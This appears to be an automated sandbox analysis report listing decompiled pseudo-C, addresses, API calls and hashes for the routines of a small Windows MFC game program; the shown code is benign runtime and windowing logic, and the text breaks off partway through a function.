      0x009a6f63
      0x009a6f39
      0x009a6f39
      0x009a6f4c
      0x009a6f4e
      0x009a6f4e
      0x009a6f2f
      0x009a6f65
      0x009a6f6d
      0x009a6f8d
      0x009a6f8d
      0x009a6f93
      0x009a6f97
      0x00000000
      0x00000000
      0x009a6f7b
      0x009a6f88
      0x009a6f88
      0x009a6f8a
      0x009a6f8c
      0x009a6f8c
      0x009a6f9d

      APIs
        • Part of subcall function 009B0A7A: GetWindowLongA.USER32 ref: 009B0A85
      • SendMessageA.USER32 ref: 009A6F4C
      • SendMessageA.USER32 ref: 009A6F63
      • GetDesktopWindow.USER32 ref: 009A6F67
      • SendMessageA.USER32 ref: 009A6F88
      • GetWindow.USER32(00000000), ref: 009A6F8D
      Yara matches
      Similarity
      • API ID: MessageSendWindow$DesktopLong
      • String ID:
      • API String ID: 2272707703-0
      • Opcode ID: 4483101dcc1c27393aac645e70c2d3338a53840ea4650bfd15b708354d5a09f8
      • Instruction ID: 2258057b9c5b68be9147bce08981e18632b7c83ff93953da1ef6319ae0f43f01
      • Opcode Fuzzy Hash: 4483101dcc1c27393aac645e70c2d3338a53840ea4650bfd15b708354d5a09f8
      • Instruction Fuzzy Hash: 88110A313407557FEB316B559C86F9B3B5CAF82B64F290125FA06690E1CF95DC0086D0
      Uniqueness

      Uniqueness Score: -1.00%

      C-Code - Quality: 94%
      			E00AAFE97(void* __edx, void* __edi, void* __esi, void* _a4, long _a8) {
      				void* _t7;
      				long _t8;
      				intOrPtr* _t9;
      				intOrPtr* _t12;
      				long _t27;
      				long _t30;
      
      				if(_a4 != 0) {
      					_push(__esi);
      					_t30 = _a8;
      					__eflags = _t30;
      					if(_t30 != 0) {
      						_push(__edi);
      						while(1) {
      							__eflags = _t30 - 0xffffffe0;
      							if(_t30 > 0xffffffe0) {
      								break;
      							}
      							__eflags = _t30;
      							if(_t30 == 0) {
      								_t30 = _t30 + 1;
      								__eflags = _t30;
      							}
      							_t7 = HeapReAlloc( *0xd13a24, 0, _a4, _t30);
      							_t27 = _t7;
      							__eflags = _t27;
      							if(_t27 != 0) {
      								L17:
      								_t8 = _t27;
      							} else {
      								__eflags =  *0xd142e8 - _t7;
      								if(__eflags == 0) {
      									_t9 = E00AADB06(__eflags);
      									 *_t9 = E00AADAC4(GetLastError());
      									goto L17;
      								} else {
      									__eflags = E00AB6403(_t7, _t30);
      									if(__eflags == 0) {
      										_t12 = E00AADB06(__eflags);
      										 *_t12 = E00AADAC4(GetLastError());
      										L12:
      										_t8 = 0;
      										__eflags = 0;
      									} else {
      										continue;
      									}
      								}
      							}
      							goto L14;
      						}
      						E00AB6403(_t6, _t30);
      						 *((intOrPtr*)(E00AADB06(__eflags))) = 0xc;
      						goto L12;
      					} else {
      						E00AAB4AB(_a4);
      						_t8 = 0;
      					}
      					L14:
      					return _t8;
      				} else {
      					return E00AACF9B(__edx, __edi, __esi, _a8);
      				}
      			}

      0x00aafea0
      0x00aafead
      0x00aafeae
      0x00aafeb1
      0x00aafeb3
      0x00aafec2
      0x00aafef5
      0x00aafef5
      0x00aafef8
      0x00000000
      0x00000000
      0x00aafec5
      0x00aafec7
      0x00aafec9
      0x00aafec9
      0x00aafec9
      0x00aafed6
      0x00aafedc
      0x00aafede
      0x00aafee0
      0x00aaff40
      0x00aaff40
      0x00aafee2
      0x00aafee2
      0x00aafee8
      0x00aaff2a
      0x00aaff3e
      0x00000000
      0x00aafeea
      0x00aafef1
      0x00aafef3
      0x00aaff12
      0x00aaff26
      0x00aaff0c
      0x00aaff0c
      0x00aaff0c
      0x00000000
      0x00000000
      0x00000000
      0x00aafef3
      0x00aafee8
      0x00000000
      0x00aaff0e
      0x00aafefb
      0x00aaff06
      0x00000000
      0x00aafeb5
      0x00aafeb8
      0x00aafebe
      0x00aafebe
      0x00aaff0f
      0x00aaff11
      0x00aafea2
      0x00aafeac
      0x00aafeac

      APIs
      • _malloc.LIBCMT ref: 00AAFEA5
        • Part of subcall function 00AACF9B: __FF_MSGBANNER.LIBCMT ref: 00AACFB4
        • Part of subcall function 00AACF9B: __NMSG_WRITE.LIBCMT ref: 00AACFBB
        • Part of subcall function 00AACF9B: RtlAllocateHeap.NTDLL(00000000,00000001,00000001,00000000,00000000,?,00AB4D5B,00000000,00000001,00000000,?,00AB501C,00000018,00B19770,0000000C,00AB50AC), ref: 00AACFE0
      • _free.LIBCMT ref: 00AAFEB8
      Yara matches
      Similarity
      • API ID: AllocateHeap_free_malloc
      • String ID:
      • API String ID: 1020059152-0
      • Opcode ID: c6b137aacc4d4bc291093d83299fbeb8d1ac105a06486add407fa2b2fa0c39f5
      • Instruction ID: fb0e068b4179478cff97fcf15b5b3d4ef83967e326d89c5cceca5d29e9244e52
      • Opcode Fuzzy Hash: c6b137aacc4d4bc291093d83299fbeb8d1ac105a06486add407fa2b2fa0c39f5
      • Instruction Fuzzy Hash: 6911CA324046116FCF366BF4AD0569E37A59F473B1B258436F456D71E2EF34CC8286A4
      Uniqueness

      Uniqueness Score: -1.00%

      C-Code - Quality: 65%
      			E009A77B8(void* __ebx, intOrPtr __ecx, void* __edx, void* __edi, void* __eflags, struct HWND__* _a4, unsigned int _a8) {
      				signed int _v8;
      				char _v268;
      				struct HWND__* _v272;
      				intOrPtr _v276;
      				void* __esi;
      				void* __ebp;
      				signed int _t22;
      				int _t28;
      				unsigned int _t48;
      				void* _t51;
      				void* _t54;
      				intOrPtr _t55;
      				void* _t56;
      				signed int _t60;
      
      				_t52 = __edi;
      				_t51 = __edx;
      				_t42 = __ebx;
      				_t58 = _t60;
      				_t22 =  *0xd0c910; // 0x3a0e8b0c
      				_v8 = _t22 ^ _t60;
      				_push(_t54);
      				_v276 = __ecx;
      				_v272 = _a4;
      				_t55 =  *((intOrPtr*)(E009BD77F(__ebx, __edi, _t54, __eflags) + 4));
      				if(_t55 != 0 && _a8 != 0) {
      					_t48 = _a8 >> 0x10;
      					if(_t48 != 0) {
      						_t28 =  *(_t55 + 0x98) & 0x0000ffff;
      						if(_a8 == _t28 && _t48 ==  *(_t55 + 0x9a)) {
      							_push(__ebx);
      							_push(__edi);
      							GlobalGetAtomNameA(_t28,  &_v268, 0x103);
      							GlobalAddAtomA( &_v268);
      							GlobalGetAtomNameA( *(_t55 + 0x9a) & 0x0000ffff,  &_v268, 0x103);
      							GlobalAddAtomA( &_v268);
      							SendMessageA(_v272, 0x3e4,  *(_v276 + 0x20), ( *(_t55 + 0x9a) & 0x0000ffff) << 0x00000010 |  *(_t55 + 0x98) & 0x0000ffff);
      							_pop(_t52);
      							_pop(_t42);
      						}
      					}
      				}
      				_pop(_t56);
      				return E00AAB46A(0, _t42, _v8 ^ _t58, _t51, _t52, _t56);
      			}

      0x009a77b8
      0x009a77b8
      0x009a77b8
      0x009a77bb
      0x009a77c3
      0x009a77ca
      0x009a77d0
      0x009a77d1
      0x009a77d7
      0x009a77e2
      0x009a77e7
      0x009a77fb
      0x009a7801
      0x009a7807
      0x009a7812
      0x009a781d
      0x009a781e
      0x009a7832
      0x009a7841
      0x009a7857
      0x009a7860
      0x009a788a
      0x009a7890
      0x009a7891
      0x009a7891
      0x009a7812
      0x009a7801
      0x009a7899
      0x009a78a0

      APIs
      • GlobalGetAtomNameA.KERNEL32(?,?,00000103), ref: 009A7832
      • GlobalAddAtomA.KERNEL32 ref: 009A7841
      • GlobalGetAtomNameA.KERNEL32(?,?,00000103), ref: 009A7857
      • GlobalAddAtomA.KERNEL32 ref: 009A7860
      • SendMessageA.USER32 ref: 009A788A
      Yara matches
      Similarity
      • API ID: AtomGlobal$Name$MessageSend
      • String ID:
      • API String ID: 1515195355-0
      • Opcode ID: 89540e5766252372b0a5834b933bb7ceab2af91552c751fc52a7c66cb8bbc651
      • Instruction ID: 872a7be22e195ed9c85bd2dd9b3409474cab63d41dc2c7deed1813cdca23fc1c
      • Opcode Fuzzy Hash: 89540e5766252372b0a5834b933bb7ceab2af91552c751fc52a7c66cb8bbc651
      • Instruction Fuzzy Hash: F9216275900218AACB24DFA9CC45AEAB3F8EB59300F00855AE599D7141D7B49EC4CF94
      Uniqueness

      Uniqueness Score: -1.00%

      C-Code - Quality: 91%
      			E009B91C1(void* __ebx, void* __edi, void* __esi, void* __eflags, signed int _a4, intOrPtr _a8, char _a12) {
      				intOrPtr* _v0;
      				signed int _v4;
      				signed int _v8;
      				signed int _v16;
      				intOrPtr* _t26;
      				void* _t33;
      				void* _t36;
      				signed int _t39;
      				signed int _t42;
      				void* _t48;
      
      				_t48 = __eflags;
      				_t36 = __ebx;
      				E00AAD232(0xad0a5c, __ebx, __edi, __esi);
      				_t42 = E009A6291(_t48, 0xc);
      				_t39 = 4;
      				_v16 = _t42;
      				_v4 = _v4 & 0x00000000;
      				if(_t42 == 0) {
      					_t42 = 0;
      					__eflags = 0;
      				} else {
      					_t39 = _t42;
      					E009B879E(_t39);
      					 *(_t42 + 8) =  *(_t42 + 8) & 0x00000000;
      					 *_t42 = 0xad9dc0;
      				}
      				_v8 = _v8 | 0xffffffff;
      				 *(_t42 + 8) = _a4;
      				_a4 = _t42;
      				E00AAB8C9( &_a4, 0xb0ca34);
      				asm("int3");
      				_t26 = _v0;
      				_push(_t36);
      				if(_t26 != 0) {
      					 *_t26 = 0;
      				}
      				if(FormatMessageA(0x1100, 0,  *(_t39 + 8), 0x800,  &_a12, 0, 0) != 0) {
      					E009A6677(_t39, E00AAF0A3(_a4, _a8, _a12, 0xffffffff));
      					LocalFree(_a12);
      					_t33 = 1;
      					__eflags = 1;
      				} else {
      					 *_a4 = 0;
      					_t33 = 0;
      				}
      				return _t33;
      			}

      0x009b91c1
      0x009b91c1
      0x009b91c8
      0x009b91d4
      0x009b91d6
      0x009b91d7
      0x009b91da
      0x009b91e0
      0x009b91f5
      0x009b91f5
      0x009b91e2
      0x009b91e2
      0x009b91e4
      0x009b91e9
      0x009b91ed
      0x009b91ed
      0x009b91fa
      0x009b91fe
      0x009b920a
      0x009b920d
      0x009b9212
      0x009b9218
      0x009b921b
      0x009b9220
      0x009b9222
      0x009b9222
      0x009b9240
      0x009b925c
      0x009b9267
      0x009b926f
      0x009b926f
      0x009b9242
      0x009b9245
      0x009b9247
      0x009b9247
      0x009b9272

      APIs
      • __EH_prolog3.LIBCMT ref: 009B91C8
        • Part of subcall function 009A6291: _malloc.LIBCMT ref: 009A62AF
      • __CxxThrowException@8.LIBCMT ref: 009B920D
      • FormatMessageA.KERNEL32(00001100,00000000,?,00000800,009B9E3B,00000000,00000000,00000000,?,009B9E3B,00B0CA34,00000004,009A5508,009B9E3B,?,009B9E3B), ref: 009B9238
      • __cftof.LIBCMT ref: 009B9256
      • LocalFree.KERNEL32(009B9E3B,009A5508,009B9E3B,?,009B9E3B), ref: 009B9267
      Yara matches
      Similarity
      • API ID: Exception@8FormatFreeH_prolog3LocalMessageThrow__cftof_malloc
      • String ID:
      • API String ID: 1808948168-0
      • Opcode ID: 7613d5c61e47362c5e281cf4d9ef360feb3c39bfd156c892f9020870dd40c9c2
      • Instruction ID: acbffb8ddc25ec5d375a45902a9b2f933542184d84e653b48ed8dbec2f9b3fc2
      • Opcode Fuzzy Hash: 7613d5c61e47362c5e281cf4d9ef360feb3c39bfd156c892f9020870dd40c9c2
      • Instruction Fuzzy Hash: 5911D3B2514249BFDB11DFA4CC85BAE7BA8BF05320F104529FA658A291D771D900C790
      Uniqueness

      Uniqueness Score: -1.00%

      C-Code - Quality: 75%
      			E009BB926(void* __ecx, intOrPtr __edx, struct HWND__* _a4, CHAR* _a8) {
      				signed int _v8;
      				char _v263;
      				char _v264;
      				void* __ebx;
      				void* __edi;
      				void* __esi;
      				void* __ebp;
      				signed int _t9;
      				struct HWND__* _t22;
      				intOrPtr _t23;
      				void* _t24;
      				intOrPtr _t27;
      				int _t29;
      				intOrPtr _t30;
      				CHAR* _t32;
      				intOrPtr _t33;
      				signed int _t37;
      
      				_t27 = __edx;
      				_t24 = __ecx;
      				_t35 = _t37;
      				_t9 =  *0xd0c910; // 0x3a0e8b0c
      				_v8 = _t9 ^ _t37;
      				_t22 = _a4;
      				_t32 = _a8;
      				if(_t22 == 0) {
      					L2:
      					E009B8782(_t24);
      				}
      				if(_t32 == 0) {
      					goto L2;
      				}
      				_t29 = lstrlenA(_t32);
      				_v264 = 0;
      				E00AAB3F0( &_v263, 0, 0xff);
      				if(_t29 > 0x100 || GetWindowTextA(_t22,  &_v264, 0x100) != _t29 || lstrcmpA( &_v264, _t32) != 0) {
      					_t16 = SetWindowTextA(_t22, _t32);
      				}
      				_pop(_t30);
      				_pop(_t33);
      				_pop(_t23);
      				return E00AAB46A(_t16, _t23, _v8 ^ _t35, _t27, _t30, _t33);
      			}

      APIs
      • lstrlenA.KERNEL32(?,?,?,?), ref: 009BB952
      • _memset.LIBCMT ref: 009BB96F
      • GetWindowTextA.USER32 ref: 009BB989
      • lstrcmpA.KERNEL32(00000000,?,?,?,?), ref: 009BB99B
      • SetWindowTextA.USER32(?,?), ref: 009BB9A7
        • Part of subcall function 009B8782: __CxxThrowException@8.LIBCMT ref: 009B8798
      Yara matches
      Similarity
      • API ID: TextWindow$Exception@8Throw_memsetlstrcmplstrlen
      • String ID:
      • API String ID: 289641511-0
      • Opcode ID: 420a9713d89638e22edb5afb235d41b57fc0d16a042232085ea7a4bb4865523c
      • Instruction ID: 922d0e83ddd9aa2363053393422f57248ea4332bf427e859b5287bfdbe8fdc54
      • Opcode Fuzzy Hash: 420a9713d89638e22edb5afb235d41b57fc0d16a042232085ea7a4bb4865523c
      • Instruction Fuzzy Hash: 9C0104B66012186BD720EB64DE85FDF776CEF49754F040065FA06D3181DBB0DE408B60
      Uniqueness

      Uniqueness Score: -1.00%

      C-Code - Quality: 87%
      			E00A39DE8(void* __ebx, intOrPtr __ecx, void* __edx, CHAR* _a4, void* _a8) {
      				intOrPtr _v8;
      				void* __edi;
      				void* __esi;
      				void* __ebp;
      				void* _t9;
      				void* _t10;
      				void* _t16;
      				void* _t17;
      				void* _t21;
      				void* _t22;
      				struct HRSRC__* _t23;
      				struct HINSTANCE__* _t26;
      				void* _t28;
      
      				_t21 = __edx;
      				_t16 = __ebx;
      				_push(__ecx);
      				_t26 = _a8;
      				_push(_t22);
      				_v8 = __ecx;
      				_t29 = _t26;
      				if(_t26 == 0) {
      					_t26 =  *(E009BD77F(__ebx, _t22, _t26, _t29) + 0xc);
      				}
      				_t23 = FindResourceA(_t26, _a4,  *0xd11ecc);
      				if(_t23 != 0) {
      					_t9 = LoadResource(_t26, _t23);
      					_a8 = _t9;
      					__eflags = _t9;
      					if(_t9 == 0) {
      						goto L3;
      					}
      					_push(_t16);
      					_t17 = LockResource(_t9);
      					__eflags = _t17;
      					if(_t17 != 0) {
      						_t28 = E00A39D16(_v8, _t21, _t23, _t17, SizeofResource(_t26, _t23));
      					} else {
      						_t28 = 0;
      						__eflags = 0;
      					}
      					FreeResource(_a8);
      					_t10 = _t28;
      					goto L4;
      				} else {
      					L3:
      					_t10 = 0;
      					L4:
      					return _t10;
      				}
      			}

      APIs
      • FindResourceA.KERNEL32(?,?,76C46910), ref: 00A39E0C
      • LoadResource.KERNEL32(?,00000000,?,00A3BCA6,?,?,?,00000084,00A3C07A,0000000A,0000000A,0000000A,00000000,00000014,00A0AA38,00000004), ref: 00A39E22
      • LockResource.KERNEL32(00000000,?,?,00A3BCA6,?,?,?,00000084,00A3C07A,0000000A,0000000A,0000000A,00000000,00000014,00A0AA38,00000004), ref: 00A39E31
      • FreeResource.KERNEL32(?,00000000,00000000,?,?,00A3BCA6,?,?,?,00000084,00A3C07A,0000000A,0000000A,0000000A,00000000,00000014), ref: 00A39E42
      • SizeofResource.KERNEL32(?,00000000,?,?,00A3BCA6,?,?,?,00000084,00A3C07A,0000000A,0000000A,0000000A,00000000,00000014,00A0AA38), ref: 00A39E4F
      Yara matches
      Similarity
      • API ID: Resource$FindFreeLoadLockSizeof
      • String ID:
      • API String ID: 4159136517-0
      • Opcode ID: c2ba00598a162110c823128ebd392b237bdf0a27cce41d58875bbffa779e1d40
      • Instruction ID: 75a70f5d736e843a7f745992a1ed4fdc8fb909e6b9e47f8dca36693c4cb8c00d
      • Opcode Fuzzy Hash: c2ba00598a162110c823128ebd392b237bdf0a27cce41d58875bbffa779e1d40
      • Instruction Fuzzy Hash: CC018F7A501711BF8B11ABA5DD4989B7BACEF95361B218016FD0297211DBB4DD01CBB0
      Uniqueness

      Uniqueness Score: -1.00%

      C-Code - Quality: 100%
      			E009A6D4B(void* __ecx) {
      				struct tagMSG _v32;
      				void* __ebp;
      				void* _t9;
      				void* _t13;
      				void* _t26;
      
      				_t26 = __ecx;
      				if( *((intOrPtr*)(__ecx + 0x88)) != 0) {
      					if(PeekMessageA( &_v32,  *(__ecx + 0x20), 0x367, 0x367, 3) == 0) {
      						PostMessageA( *(_t26 + 0x20), 0x367, 0, 0);
      					}
      					if(GetCapture() ==  *(_t26 + 0x20)) {
      						ReleaseCapture();
      					}
      					_t13 = E009AD852(_t26);
      					if(_t13 == 0) {
      						_t13 = E009B8782(0);
      					}
      					 *((intOrPtr*)(_t26 + 0x88)) = 0;
      					 *((intOrPtr*)(_t13 + 0x88)) = 0;
      					return PostMessageA( *(_t26 + 0x20), 0x36a, 0, 0);
      				}
      				return _t9;
      			}

      APIs
      Yara matches
      Similarity
      • API ID: Message$CapturePost$PeekRelease
      • String ID:
      • API String ID: 1125932295-0
      • Opcode ID: 22371a54a10e43dd47d2a9f8b5ac848c3d98b0b159ff1e62ac718eb5c635d35b
      • Instruction ID: e0c272e249152eec1e5019898f977349c727e3ca10e2b7404f7b18a9640cd9a3
      • Opcode Fuzzy Hash: 22371a54a10e43dd47d2a9f8b5ac848c3d98b0b159ff1e62ac718eb5c635d35b
      • Instruction Fuzzy Hash: A1016231701604ABDB256B75DC89F5B7BBCFB85B08F54452DF08AA2191EA71A801C760
      Uniqueness

      Uniqueness Score: -1.00%

      C-Code - Quality: 77%
      			E00AB784E(void* __ebx, void* __edx, void* __edi, void* __esi, void* __eflags) {
      				signed int _t12;
      				void* _t25;
      				void* _t28;
      				intOrPtr _t29;
      				void* _t30;
      				void* _t31;
      
      				_t31 = __eflags;
      				_t26 = __edi;
      				_t25 = __edx;
      				_t20 = __ebx;
      				_push(0xc);
      				_push(0xb198b0);
      				E00AAD340(__ebx, __edi, __esi);
      				_t28 = E00AB4284(__ebx, _t31);
      				_t12 =  *0xd0d440; // 0xfffffffe
      				if(( *(_t28 + 0x70) & _t12) == 0) {
      					L6:
      					E00AB5091(_t20, _t26, 0xc);
      					 *(_t30 - 4) =  *(_t30 - 4) & 0x00000000;
      					_t29 = _t28 + 0x6c;
      					 *((intOrPtr*)(_t30 - 0x1c)) = E00AB7801(_t29,  *0xd0d688);
      					 *(_t30 - 4) = 0xfffffffe;
      					E00AB78BB();
      				} else {
      					_t33 =  *((intOrPtr*)(_t28 + 0x6c));
      					if( *((intOrPtr*)(_t28 + 0x6c)) == 0) {
      						goto L6;
      					} else {
      						_t29 =  *((intOrPtr*)(E00AB4284(_t20, _t33) + 0x6c));
      					}
      				}
      				_t34 = _t29;
      				if(_t29 == 0) {
      					_push(0x20);
      					E00AACC26(_t25, _t34);
      				}
      				return E00AAD385(_t29);
      			}

      APIs
      • __getptd.LIBCMT ref: 00AB785A
        • Part of subcall function 00AB4284: __getptd_noexit.LIBCMT ref: 00AB4287
        • Part of subcall function 00AB4284: __amsg_exit.LIBCMT ref: 00AB4294
      • __getptd.LIBCMT ref: 00AB7871
      • __amsg_exit.LIBCMT ref: 00AB787F
      • __lock.LIBCMT ref: 00AB788F
      • __updatetlocinfoEx_nolock.LIBCMT ref: 00AB78A3
      Yara matches
      Similarity
      • API ID: __amsg_exit__getptd$Ex_nolock__getptd_noexit__lock__updatetlocinfo
      • String ID:
      • API String ID: 938513278-0
      • Opcode ID: d9b9560ffe1d0902301e967c764cefcb2d1335aef5ea8c1abe0e24b062506d99
      • Instruction ID: 964ce8e4116985e68f93841a5af81259e4456b7cf039134685909cc261c6dc53
      • Opcode Fuzzy Hash: d9b9560ffe1d0902301e967c764cefcb2d1335aef5ea8c1abe0e24b062506d99
      • Instruction Fuzzy Hash: 4BF02432908310DBEB21BFF49A0B7CC3BA8AF44720F100109F045AB2D3DBB45880DAB6
      Uniqueness

      Uniqueness Score: -1.00%

      C-Code - Quality: 83%
      			E009C998C(void* __ecx, intOrPtr __edx, intOrPtr _a4, intOrPtr _a8) {
      				signed int _v8;
      				struct tagRECT _v24;
      				intOrPtr _v28;
      				long _v32;
      				intOrPtr _v44;
      				char _v48;
      				char* _v56;
      				intOrPtr _v64;
      				char _v96;
      				intOrPtr _v108;
      				intOrPtr _v112;
      				char _v136;
      				void* __ebx;
      				void* __edi;
      				void* __esi;
      				void* __ebp;
      				signed int _t36;
      				char _t41;
      				intOrPtr _t42;
      				void* _t47;
      				intOrPtr _t50;
      				void* _t52;
      				intOrPtr _t56;
      				intOrPtr* _t60;
      				intOrPtr _t61;
      				intOrPtr _t72;
      				intOrPtr _t75;
      				void* _t77;
      				intOrPtr _t78;
      				intOrPtr _t79;
      				signed int _t84;
      
      				_t72 = __edx;
      				_t82 = _t84;
      				_t36 =  *0xd0c910; // 0x3a0e8b0c
      				_v8 = _t36 ^ _t84;
      				_t59 = _a8;
      				_v28 = _a4;
      				_t77 = __ecx;
      				E00AAB3F0( &_v48, 0, 0x14);
      				_t41 =  *((intOrPtr*)(_t77 + 0x80));
      				_v32 = 0;
      				_v44 = _a8;
      				if(_t41 == 0) {
      					_t41 =  *((intOrPtr*)(_t77 + 0x70));
      				}
      				_v48 = _t41;
      				_t42 =  *((intOrPtr*)(_t77 + 0x7c));
      				_t91 = _t42;
      				if(_t42 == 0) {
      					_t42 = 0xad7b14;
      				}
      				_t63 = _t42;
      				_t60 = E009BB845(_t59, _t42, 0, _t77, _t91);
      				if(_t60 != 0) {
      					_t78 =  *((intOrPtr*)(_t77 + 0x64));
      					__eflags = _t78;
      					if(_t78 == 0) {
      						E00AAB3F0( &_v96, 0, 0x30);
      						_v64 = 0x44000000;
      						E009AFF05(_t60, _t63, 0, _t78, __eflags, 8);
      						_v56 = "AfxFrameOrView100s";
      						_t47 = E009BD77F(_t60, 0, _t78, __eflags);
      						_push( &_v136);
      						_push(_v56);
      						_push( *((intOrPtr*)(_t47 + 8)));
      						__eflags = E009A6ACA( &_v136, _t78, __eflags);
      						if(__eflags == 0) {
      							goto L10;
      						} else {
      							_t52 = E009AFC32( &_v136, __eflags, _v136, _v112, _v108, 0);
      							_v24.left = 0;
      							_v24.top = 0;
      							_v24.right = 0;
      							_v24.bottom = 0;
      							SetRectEmpty( &_v24);
      							_t56 =  *((intOrPtr*)( *_t60 + 0x160))(_t52, 0xad8d30, _v64,  &_v24, _v28, 0, 0,  &_v48);
      							goto L9;
      						}
      					} else {
      						_t56 =  *((intOrPtr*)( *_t60 + 0x164))(_t78, 0x44000000, _v28,  &_v48);
      						L9:
      						__eflags = _t56;
      						if(_t56 == 0) {
      							goto L6;
      						} else {
      							L10:
      							_t50 = _t60;
      						}
      					}
      				} else {
      					L6:
      					_t50 = 0;
      				}
      				_pop(_t75);
      				_pop(_t79);
      				_pop(_t61);
      				return E00AAB46A(_t50, _t61, _v8 ^ _t82, _t72, _t75, _t79);
      			}

      APIs
      Strings
      Yara matches
      Similarity
      • API ID: _memset$EmptyRect
      • String ID: AfxFrameOrView100s
      • API String ID: 3779055983-3095774114
      • Opcode ID: 64851302462db2fc24e08f379b28dce1b64364c88a540a287004cdd9248a7da8
      • Instruction ID: e69406bb258bf7b8a2f24550dbedd14883549698c3c358ccdb82cdfb93ff94b6
      • Opcode Fuzzy Hash: 64851302462db2fc24e08f379b28dce1b64364c88a540a287004cdd9248a7da8
      • Instruction Fuzzy Hash: 27315B71E00209AFCF11DFA9C889EEEBBB9FB89344F104429F555A7251EB309D04CB61
      Uniqueness

      Uniqueness Score: -1.00%

      C-Code - Quality: 57%
      			E009A6040(void* __edx, intOrPtr _a4) {
      				RECT* _v8;
      				char _v16;
      				char _v20;
      				void* __ebx;
      				void* __ecx;
      				void* __edi;
      				void* __esi;
      				void* __ebp;
      				signed int _t29;
      				intOrPtr* _t32;
      				void* _t37;
      				intOrPtr* _t42;
      				void* _t45;
      				char _t46;
      				void* _t48;
      				struct HWND__* _t54;
      				void* _t68;
      				signed int _t70;
      				intOrPtr* _t71;
      
      				_push(0xffffffff);
      				_push(0xac7c98);
      				_push( *[fs:0x0]);
      				_push(_t48);
      				_push(_t45);
      				_t29 =  *0xd0c910; // 0x3a0e8b0c
      				_push(_t29 ^ _t70);
      				 *[fs:0x0] =  &_v16;
      				_t68 = _t48;
      				_t32 = E009B9D52();
      				_t71 = _t32;
      				_t50 = 0 | _t71 == 0x00000000;
      				if(_t71 == 0) {
      					_t32 = E009A54F0(_t45, _t50, __edx, 0, _t68, 0x80004005);
      				}
      				_t61 =  *_t32;
      				_v20 =  *((intOrPtr*)( *((intOrPtr*)( *_t32 + 0xc))))() + 0x10;
      				_t37 = _a4 - 1;
      				_v8 = 0;
      				if(_t37 == 0) {
      					if( *((intOrPtr*)(_t68 + 0x7c)) != 9) {
      						_push(8);
      						_push("You Win!");
      					} else {
      						_push(5);
      						_push("Draw!");
      					}
      					goto L8;
      				} else {
      					if(_t37 != 1) {
      						L9:
      						_t46 = _v20;
      						E009ABD1F(_t46, _t68, 0, _t46, 0, 0);
      						 *((intOrPtr*)(_t68 + 0x178)) = 0;
      						 *((intOrPtr*)(_t68 + 0x17c)) = 0;
      						 *((intOrPtr*)(_t68 + 0x180)) = 0;
      						 *((intOrPtr*)(_t68 + 0x184)) = 0;
      						 *((intOrPtr*)(_t68 + 0x188)) = 0;
      						 *((intOrPtr*)(_t68 + 0x18c)) = 0;
      						 *((intOrPtr*)(_t68 + 0x190)) = 0;
      						 *((intOrPtr*)(_t68 + 0x194)) = 0;
      						 *((intOrPtr*)(_t68 + 0x198)) = 0;
      						 *((intOrPtr*)(_t68 + 0x19c)) = 0;
      						_t54 =  *(_t68 + 0x20);
      						InvalidateRect(_t54, 0, 1);
      						_t42 = _t46 - 0x10;
      						_v8 = 0xffffffff;
      						asm("lock xadd [edx], ecx");
      						if((_t54 | 0xffffffff) - 1 <= 0) {
      							_t42 =  *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)( *_t42)) + 4))))(_t42);
      						}
      						 *[fs:0x0] = _v16;
      						return _t42;
      					}
      					_push(9);
      					_push("You Lose!");
      					L8:
      					E009A5F60( &_v20, _t61, 0);
      					 *((intOrPtr*)(_t68 + 0x7c)) = 0;
      					goto L9;
      				}
      			}

      APIs
      • InvalidateRect.USER32(?,00000000,00000001,?,00000000,00000000,You Win!,00000008), ref: 009A611B
      Strings
      Yara matches
      Similarity
      • API ID: InvalidateRect
      • String ID: Draw!$You Lose!$You Win!
      • API String ID: 634782764-330078758
      • Opcode ID: 67ae2a2dfd2ede96bdc703317c64f8124f009732682ac1b9e2db03227c5c8ff2
      • Instruction ID: 13e28758ae9d832430a2623379118c9f59cdbdc17fdfb83cf96a5aa16aeee56f
      • Opcode Fuzzy Hash: 67ae2a2dfd2ede96bdc703317c64f8124f009732682ac1b9e2db03227c5c8ff2
      • Instruction Fuzzy Hash: 60316571604B05AFC764CF29C845FAAB7E4FB89710F148A2EE56AD7290EB706940CF90
      Uniqueness

      Uniqueness Score: -1.00%

      C-Code - Quality: 75%
      			E009AFC32(void* __ecx, void* __eflags, char _a4, intOrPtr _a8, intOrPtr _a12, intOrPtr _a16) {
      				intOrPtr _v8;
      				intOrPtr _v12;
      				intOrPtr _v16;
      				intOrPtr _v20;
      				intOrPtr _v24;
      				intOrPtr _v28;
      				intOrPtr _v32;
      				intOrPtr _v36;
      				intOrPtr _v40;
      				intOrPtr _v44;
      				char _v48;
      				void* __ebx;
      				void* __edi;
      				void* __esi;
      				void* __ebp;
      				intOrPtr* _t34;
      				intOrPtr* _t36;
      				intOrPtr* _t37;
      				void* _t39;
      				intOrPtr* _t53;
      				void* _t55;
      				intOrPtr _t56;
      				void* _t59;
      				void* _t61;
      				intOrPtr _t62;
      
      				_t1 = E009BD1B0(_t55, _t59, _t61, __eflags) + 0x7c; // 0x7c
      				_t62 = _t1;
      				_t56 =  *((intOrPtr*)(E009BD77F(_t55, _t59, _t62, __eflags) + 8));
      				if(_a8 != 0 || _a12 != 0) {
      					L4:
      					_v8 =  *((intOrPtr*)(E00AADB06(__eflags)));
      					_t34 = E00AADB06(__eflags);
      					_push(_a16);
      					 *_t34 = 0;
      					_push(_a12);
      					_push(_a8);
      					_push(_a4);
      					E00AADA2A(_t62, 0x60, 0x5f, "Afx:%p:%x:%p:%p:%p", _t56);
      					goto L5;
      				} else {
      					_t69 = _a16;
      					if(_a16 != 0) {
      						goto L4;
      					}
      					_v8 =  *((intOrPtr*)(E00AADB06(_t69)));
      					_t53 = E00AADB06(_t69);
      					_push(_a4);
      					 *_t53 = 0;
      					E00AADA2A(_t62, 0x60, 0x5f, "Afx:%p:%x", _t56);
      					L5:
      					_t36 = E00AADB06(_t69);
      					_t70 =  *_t36;
      					if( *_t36 == 0) {
      						_t37 = E00AADB06(__eflags);
      						_t58 = _v8;
      						 *_t37 = _v8;
      					} else {
      						E009A9F23( *((intOrPtr*)(E00AADB06(_t70))));
      						_pop(_t58);
      					}
      					_push( &_v48);
      					_push(_t62);
      					_push(_t56);
      					_t39 = E009A6ACA(_t58, _t62, _t70);
      					_t71 = _t39;
      					if(_t39 == 0) {
      						_v48 = _a4;
      						_v44 = DefWindowProcA;
      						_v28 = _a16;
      						_v24 = _a8;
      						_v20 = _a12;
      						_push( &_v48);
      						_v36 = 0;
      						_v40 = 0;
